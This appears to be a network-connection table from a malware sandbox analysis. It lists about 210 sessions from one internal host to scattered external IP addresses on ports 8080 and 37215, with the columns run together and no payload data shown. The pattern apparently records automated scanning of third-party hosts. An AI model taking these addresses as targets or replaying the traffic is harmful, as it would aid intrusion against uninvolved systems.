                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22029192.168.2.2340850220.61.115.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22030192.168.2.2360730204.208.57.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22031192.168.2.235782275.13.235.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22032192.168.2.235575063.3.190.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22033192.168.2.2352344206.79.128.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22034192.168.2.2356160189.242.44.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22035192.168.2.234380272.121.12.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22036192.168.2.2355192199.133.43.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22037192.168.2.2348576141.151.134.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22038192.168.2.2357692156.35.251.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22039192.168.2.2345740132.174.81.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22040192.168.2.235252451.60.142.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22041192.168.2.2338540108.38.124.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22042192.168.2.2332990142.103.194.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22043192.168.2.233671868.38.64.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22044192.168.2.2358414124.219.160.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22045192.168.2.2351820189.253.151.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22046192.168.2.2342784198.154.254.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22047192.168.2.234609880.60.215.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22048192.168.2.2349248197.154.52.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22049192.168.2.2353220147.212.162.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22050192.168.2.233944848.146.75.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22051192.168.2.2353530150.89.163.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22052192.168.2.2354884119.159.163.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22053192.168.2.2339598168.29.136.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22054192.168.2.236037867.52.4.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22055192.168.2.2358628105.31.146.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22056192.168.2.2347416218.241.176.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22057192.168.2.2351426171.186.4.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22058192.168.2.234162253.219.5.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22059192.168.2.2340362211.85.142.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22060192.168.2.233457282.241.246.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22061192.168.2.2334754114.130.167.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22062192.168.2.235777299.172.81.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22063192.168.2.2340720182.81.14.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22064192.168.2.2342752115.232.31.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22065192.168.2.2333546103.18.172.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22066192.168.2.2344378162.94.19.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22067192.168.2.2350012184.59.173.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22068192.168.2.2342204121.37.76.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22069192.168.2.2351692217.203.174.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22070192.168.2.234718842.140.140.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22071192.168.2.235684270.240.234.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22072192.168.2.2337104208.22.178.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22073192.168.2.2333366223.218.143.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22074192.168.2.233654877.222.203.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22075192.168.2.2333566219.255.104.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22076192.168.2.234911648.42.124.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22077192.168.2.234612441.161.238.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22078192.168.2.2350694171.211.243.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22079192.168.2.2339468112.46.93.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22080192.168.2.2360988128.206.185.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22081192.168.2.234698466.119.136.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22082192.168.2.2353266144.240.5.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22083192.168.2.2338290105.36.94.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22084192.168.2.234446849.146.107.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22085192.168.2.2355358206.135.223.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22086192.168.2.2355402202.58.34.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22087192.168.2.235444447.101.193.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22088192.168.2.234098444.115.247.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22089192.168.2.23394188.77.209.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22090192.168.2.2340278189.50.11.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22091192.168.2.23451884.151.149.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22092192.168.2.2340870177.79.38.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22093192.168.2.2340952100.154.55.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22094192.168.2.2359058159.147.125.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22095192.168.2.234601020.156.1.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22096192.168.2.23376725.174.41.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22097192.168.2.235772039.29.173.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22098192.168.2.2359102178.210.111.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22099192.168.2.234046466.238.233.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22100192.168.2.2355280183.102.16.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22101192.168.2.2346652218.24.148.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22102192.168.2.236049883.190.206.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22103192.168.2.2343344176.74.231.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22104192.168.2.2335452121.135.198.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22105192.168.2.2356260210.221.174.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22106192.168.2.2342340157.116.1.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22107192.168.2.2358420153.46.182.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22108192.168.2.235058037.173.87.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22109192.168.2.2335018133.203.208.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22110192.168.2.235943858.200.224.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22111192.168.2.2357444199.135.196.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22112192.168.2.2342582170.254.141.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22113192.168.2.2340630112.119.13.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22114192.168.2.2336142181.147.170.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22115192.168.2.2350718213.34.208.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22116192.168.2.2333970144.27.27.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22117192.168.2.23413328.208.69.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22118192.168.2.2339614160.239.190.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22119192.168.2.2340418119.30.32.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22120192.168.2.2338146122.192.79.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22121192.168.2.234374853.199.204.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22122192.168.2.2350060123.28.95.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22123192.168.2.23416705.69.49.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22124192.168.2.2337940192.206.33.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22125192.168.2.235053080.21.245.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22126192.168.2.2349768150.6.178.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22127192.168.2.2333966181.109.89.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22128192.168.2.2347946159.62.162.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22129192.168.2.235679299.218.234.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22130192.168.2.2355516182.10.81.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22131192.168.2.235160254.246.136.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22132192.168.2.234798093.13.49.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22133192.168.2.2336666164.246.191.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22134192.168.2.235220863.7.176.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22135192.168.2.233802899.225.89.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22136192.168.2.2339490141.19.103.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22137192.168.2.23335322.92.81.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22138192.168.2.2343674120.135.59.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22139192.168.2.234190612.68.206.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22140192.168.2.2339846202.42.173.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22141192.168.2.2342280187.147.121.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22142192.168.2.2343734114.223.89.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22143192.168.2.233290481.177.234.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22144192.168.2.2360370144.89.157.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22145192.168.2.2333596134.23.173.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22146192.168.2.2334512138.23.231.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22147192.168.2.2352798170.36.210.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22148192.168.2.2337256107.130.204.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22149192.168.2.2336010163.92.37.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22150192.168.2.2348914139.218.217.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22151192.168.2.235287639.212.252.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22152192.168.2.234789478.243.31.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22153192.168.2.2347902103.193.242.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22154192.168.2.2336586157.56.221.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22155192.168.2.2356210138.127.138.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22156192.168.2.2349438106.70.67.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22157192.168.2.2344430155.99.138.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22158192.168.2.2341356147.173.120.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22159192.168.2.2335900102.239.200.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22160192.168.2.2334904103.196.148.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22161192.168.2.2357094202.176.47.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22162192.168.2.236010287.63.249.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22163192.168.2.2348524118.235.214.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22164192.168.2.234585486.149.34.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22165192.168.2.234063063.129.178.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22166192.168.2.234731663.43.144.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22167192.168.2.2356698111.52.228.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22168192.168.2.2350166202.68.8.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22169192.168.2.2345770116.43.35.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22170192.168.2.236039632.82.115.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22171192.168.2.2340044211.54.64.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22172192.168.2.2340440182.203.82.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22173192.168.2.2357570145.169.73.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22174192.168.2.2340050146.31.86.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22175192.168.2.2341486209.25.150.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22176192.168.2.2344716181.134.180.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22177192.168.2.233296074.140.93.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22178192.168.2.2348452175.238.37.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22179192.168.2.233562270.188.70.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22180192.168.2.233911619.106.40.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22181192.168.2.2334820189.244.209.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22182192.168.2.23429889.149.162.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22183192.168.2.2360898149.85.107.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22184192.168.2.2357066195.91.158.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22185192.168.2.2339820114.181.64.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22186192.168.2.2349112138.15.90.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22187192.168.2.235323689.175.10.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22188192.168.2.2357688212.241.144.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22189192.168.2.235799060.218.237.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22190192.168.2.2351346124.59.111.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22191192.168.2.2344790199.184.52.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192192.168.2.2332782172.96.249.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22193192.168.2.234610882.4.195.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22194192.168.2.233615027.73.72.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22195192.168.2.234421871.153.65.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22196192.168.2.235824681.89.49.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22197192.168.2.2346306109.26.106.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22198192.168.2.234155698.43.163.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22199192.168.2.233468467.81.126.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22200192.168.2.235805641.239.204.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22201192.168.2.233471871.97.162.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22202192.168.2.2358838164.102.18.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22203192.168.2.2348704197.68.217.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22204192.168.2.2356524197.119.102.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22205192.168.2.2349812197.17.48.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22206192.168.2.2358382157.6.238.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22207192.168.2.234819812.107.244.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22208192.168.2.2338602157.139.83.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22209192.168.2.2340006131.214.240.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22210192.168.2.235893041.62.86.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22211192.168.2.234183841.17.200.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22212192.168.2.2344502197.226.82.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22213192.168.2.2340904197.249.153.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22214192.168.2.2353110197.209.72.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22215192.168.2.2348336174.21.47.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22216192.168.2.2339310197.222.94.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22217192.168.2.2334244157.190.157.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22218192.168.2.235771241.13.160.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22219192.168.2.233794641.27.208.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22220192.168.2.2351622197.60.65.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22221192.168.2.2336858157.66.27.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22222192.168.2.2345226157.23.150.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22223192.168.2.2353938197.81.250.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22224192.168.2.2333036125.233.244.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22225192.168.2.235574459.12.4.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22226192.168.2.2359722197.201.228.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22227192.168.2.2347204118.78.15.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22228192.168.2.2353788197.132.64.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22229192.168.2.2332866157.119.100.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22230192.168.2.233974441.27.179.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22231192.168.2.2341618197.101.182.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22232192.168.2.2337468197.12.176.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22233192.168.2.2355594197.116.214.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22234192.168.2.2342586197.127.199.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22235192.168.2.2353138157.149.102.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22236192.168.2.2345610117.110.186.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22237192.168.2.2346246157.168.84.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22238192.168.2.2355356197.10.28.1737215
